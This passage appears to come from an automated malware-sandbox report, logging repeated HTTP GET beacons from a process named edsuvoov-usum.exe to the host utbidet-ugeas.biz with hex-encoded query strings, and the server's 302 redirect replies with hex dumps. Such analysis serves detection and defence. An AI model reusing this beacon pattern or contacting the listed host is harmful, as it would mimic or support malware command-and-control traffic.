                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            41192.168.2.361374172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:39.936824083 CEST201OUTGET /d/N?0249C8E2654EC8E2657BC8CA6549C86CB6DDF04A3F48C822CD4BCBD44B7BE6DB5779F8CC65 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:40.427748919 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:40 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0249C8E2654EC8E2657BC8CA6549C86CB6DDF04A3F48C822CD4BCBD44B7BE6DB5779F8CC65
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            42192.168.2.361376172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:40.568931103 CEST169OUTGET /d/N?02D0E53B31D7E53B31E2E51331D0E5B5E244DD936BD1E5FB99D2E60D1FE2CB0203E0D51531 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.083467960 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:41 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02D0E53B31D7E53B31E2E51331D0E5B5E244DD936BD1E5FB99D2E60D1FE2CB0203E0D51531
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            43192.168.2.361377172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.089495897 CEST201OUTGET /d/N?02D0E53B31D7E53B31E2E51331D0E5B5E244DD936BD1E5FB99D2E60D1FE2CB0203E0D51531 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:41.571827888 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:41 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02D0E53B31D7E53B31E2E51331D0E5B5E244DD936BD1E5FB99D2E60D1FE2CB0203E0D51531
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            44192.168.2.361379172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:43.772919893 CEST169OUTGET /d/N?02F373F88DF473F88DC173D08DF373765E674B50D7F2733825F170CEA3C15DC1BFC343D68D HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.254594088 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:44 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02F373F88DF473F88DC173D08DF373765E674B50D7F2733825F170CEA3C15DC1BFC343D68D
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            45192.168.2.361380172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.266042948 CEST201OUTGET /d/N?02F373F88DF473F88DC173D08DF373765E674B50D7F2733825F170CEA3C15DC1BFC343D68D HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:44.768011093 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:44 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02F373F88DF473F88DC173D08DF373765E674B50D7F2733825F170CEA3C15DC1BFC343D68D
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            46192.168.2.361382172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:45.851108074 CEST169OUTGET /d/N?027026E9E57726E9E54226C1E570266736E41E41BF7126294D7225DFCB4208D0D74016C7E5 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.325655937 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:46 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?027026E9E57726E9E54226C1E570266736E41E41BF7126294D7225DFCB4208D0D74016C7E5
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            47192.168.2.361383172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.334979057 CEST201OUTGET /d/N?027026E9E57726E9E54226C1E570266736E41E41BF7126294D7225DFCB4208D0D74016C7E5 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.821847916 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:46 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?027026E9E57726E9E54226C1E570266736E41E41BF7126294D7225DFCB4208D0D74016C7E5
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            48192.168.2.361385172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:46.970654964 CEST169OUTGET /d/N?0228CC01DC2FCC01DC1ACC29DC28CC8F0FBCF4A98629CCC1742ACF37F21AE238EE18FC2FDC HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.473460913 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:47 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0228CC01DC2FCC01DC1ACC29DC28CC8F0FBCF4A98629CCC1742ACF37F21AE238EE18FC2FDC
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            49192.168.2.361386172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.479403973 CEST201OUTGET /d/N?0228CC01DC2FCC01DC1ACC29DC28CC8F0FBCF4A98629CCC1742ACF37F21AE238EE18FC2FDC HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:47.972366095 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:47 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0228CC01DC2FCC01DC1ACC29DC28CC8F0FBCF4A98629CCC1742ACF37F21AE238EE18FC2FDC
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            50192.168.2.361389172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.380371094 CEST169OUTGET /d/N?027812AD6B7F12AD6B4A12856B781223B8EC2A053179126DC37A119B454A3C94594822836B HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.870134115 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:49 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?027812AD6B7F12AD6B4A12856B781223B8EC2A053179126DC37A119B454A3C94594822836B
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            51192.168.2.361390172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:49.884815931 CEST201OUTGET /d/N?027812AD6B7F12AD6B4A12856B781223B8EC2A053179126DC37A119B454A3C94594822836B HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.366652966 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:50 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?027812AD6B7F12AD6B4A12856B781223B8EC2A053179126DC37A119B454A3C94594822836B
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            52192.168.2.361392172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:50.976265907 CEST169OUTGET /d/N?021685246B1185246B24850C6B1685AAB882BD8C311785E4C31486124524AB1D5926B50A6B HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:51.554553032 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:51 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?021685246B1185246B24850C6B1685AAB882BD8C311785E4C31486124524AB1D5926B50A6B
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            53192.168.2.361393172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:51.560602903 CEST201OUTGET /d/N?021685246B1185246B24850C6B1685AAB882BD8C311785E4C31486124524AB1D5926B50A6B HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:52.160300970 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:52 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?021685246B1185246B24850C6B1685AAB882BD8C311785E4C31486124524AB1D5926B50A6B
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
